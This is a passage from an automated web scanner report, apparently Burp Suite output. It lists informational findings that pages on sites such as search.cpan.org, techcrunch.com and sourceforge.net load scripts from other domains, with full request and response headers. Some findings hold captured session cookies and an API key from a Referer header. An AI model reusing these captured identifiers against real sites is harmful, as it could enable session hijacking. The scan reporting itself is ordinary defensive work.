<!DOCTYPE html>
<html>
<head>
<title>SABnzbd.org : Home of SABnzbd+, the Full-Auto Newsreader</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...

21.325. http://search.cpan.org/dist/Apache-NNTPGateway/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/Apache-NNTPGateway/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/Apache-NNTPGateway/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:17 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:17 GMT
Content-Length: 8105
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.326. http://search.cpan.org/dist/NNML/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/NNML/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/NNML/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:18 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:18 GMT
Content-Length: 9138
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.327. http://search.cpan.org/dist/NNTPClient/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/NNTPClient/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/NNTPClient/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:21 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:21 GMT
Content-Length: 7799
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.328. http://search.cpan.org/dist/News-Article-NoCeM/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/News-Article-NoCeM/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/News-Article-NoCeM/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:21 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:21 GMT
Content-Length: 7779
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.329. http://search.cpan.org/dist/POE-Component-Client-NNTP/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/POE-Component-Client-NNTP/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/POE-Component-Client-NNTP/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:22 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:22 GMT
Content-Length: 9598
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.330. http://search.cpan.org/dist/POE-Component-Server-NNTP/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/POE-Component-Server-NNTP/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/POE-Component-Server-NNTP/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:23 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:23 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:23 GMT
Content-Length: 9372
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.331. http://search.cpan.org/dist/newslib/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cpan.org
Path:	/dist/newslib/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/newslib/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:22 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:22 GMT
Content-Length: 11386
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.332. http://shopping.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.333. http://simonwillison.net/2004/May/26/addLoadEvent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://simonwillison.net
Path:	/2004/May/26/addLoadEvent/

Issue detail

The response dynamically includes the following scripts from other domains:

http://embed.technorati.com/linkcount
http://liquidfold.net/js/simonwillison
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.4
Date: Tue, 25 Jan 2011 13:16:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Tue, 25 Jan 2011 13:16:12 GMT
Vary: Cookie
Last-Modified: Tue, 25 Jan 2011 13:14:12 GMT
ETag: 62572f46c0e2e4374a72e5ad7c169014
Cache-Control: max-age=120
Set-Cookie: openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";
Content-Length: 63053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Executing JavaSc
...[SNIP]...
<p><script src="http://embed.technorati.com/linkcount" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://liquidfold.net/js/simonwillison"></script>
...[SNIP]...

21.334. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The response dynamically includes the following script from another domain:

http://a.fsdn.com/sd/all-minified.js?T_2_5_0_305

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.335. http://smallbusinessnews.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusinessnews.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.336. http://sorgalla.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorgalla.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://stats.wordpress.com/e-201103.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:33 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

21.337. http://sorgalla.com/jcarousel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorgalla.com
Path:	/jcarousel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://stats.wordpress.com/e-201103.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:31 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

21.338. http://sourceforge.net/projects/nzbget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/nzbget/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.fsdn.com/con/js/min.js?1295468581
http://a.fsdn.com/con/js/project.js?1295468581
http://a.fsdn.com/con/js/tagging.js?1295468581
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca0eb1000c61; expires="Thu, 21-Jan-2021 16:02:32 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 40706
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>

<script src="http://a.fsdn.com/con/js/min.js?1295468581" type="text/javascript"></script>

<script src="http://a.fsdn.com/con/js/project.js?1295468581" type="text/javascript"></script>
<script src="http://a.fsdn.com/con/js/tagging.js?1295468581" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...

21.339. http://sourceforge.net/projects/trn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/trn/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.fsdn.com/con/js/min.js?1295468581
http://a.fsdn.com/con/js/project.js?1295468581
http://a.fsdn.com/con/js/tagging.js?1295468581
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/trn/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca111a000af1; expires="Thu, 21-Jan-2021 16:02:35 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=9d302353afe3de71a0a2ec3d7914c1a46ba28173gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMTExYTAwMGFmMXEKVQNfaWRxC1UgMTkwODg5YjVhNTI4OWJkNDQ2OTE1ZGU4OGY3MDM4MmRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009optJ41VUOX2NyZWF0aW9uX3RpbWVxDkdB009optJ4GHUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 37454
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>

<script src="http://a.fsdn.com/con/js/min.js?1295468581" type="text/javascript"></script>

<script src="http://a.fsdn.com/con/js/project.js?1295468581" type="text/javascript"></script>
<script src="http://a.fsdn.com/con/js/tagging.js?1295468581" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...

21.340. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://tcr.tynt.com/javascripts/Tracer.js?user=aM1itcjS8r36OVadbiUzgI&s=61&lang=en
http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

Response

21.341. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js

Request

GET /wp-content/plugins/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 06 Dec 2010 16:20:51 GMT
ETag: "241427-173-496c0458b4d24"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>cross domain receiver pa
...[SNIP]...
<body>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js" type="text/javascript"></script>
...[SNIP]...

21.342. http://techcrunch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://techcrunch.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/0873.js
http://edge.quantserve.com/quant.js
http://platform.twitter.com/widgets.js
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/crunchboard_widget_v2.js?m=1268505624g
http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&ver=MU
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=techcrunch.com&id=11718616&t=1295961499&back=techcrunch.com%2F
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:20:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Tue, 25 Jan 2011 13:18:19 +0000
Cache-Control: max-age=186, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
X-nananana: Batcache
Content-Length: 124771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&host=techcrunch.com&id=11718616&t=1295961499&back=techcrunch.com%2F' type="text/javascript"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&ver=MU'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</a>
                       <script type="text/javascript" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/crunchboard_widget_v2.js?m=1268505624g"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
       <script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/0873.js"> </script>
...[SNIP]...

21.343. http://thenextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thenextweb.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.fmpub.net/site/thenextweb
http://static.fmpub.net/zone/2620
http://static.fmpub.net/zone/2621
http://static.getclicky.com/js

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 127.0.0.1
Set-Cookie: PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 102006
Date: Tue, 25 Jan 2011 13:27:48 GMT
Age: 665
Connection: close
X-Cache: HIT

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>The Next Web | TNW is the International Source for Internet Ne
...[SNIP]...
<div id="fmpub_2621" class="banner-wrapper">
<script type="text/javascript" async="true" src="http://static.fmpub.net/zone/2621" charset="utf-8"></script>
...[SNIP]...
</h3>

<script type="text/javascript" src="http://static.fmpub.net/zone/2620"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'> </script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://static.fmpub.net/site/thenextweb"></script>
...[SNIP]...

21.344. http://top.net.mk/joomla-verzii/44-joomla-16-dojde previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.net.mk
Path:	/joomla-verzii/44-joomla-16-dojde

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.addtoany.com/menu/locale/mk.js
http://static.addtoany.com/menu/page.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /joomla-verzii/44-joomla-16-dojde HTTP/1.1
Host: top.net.mk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
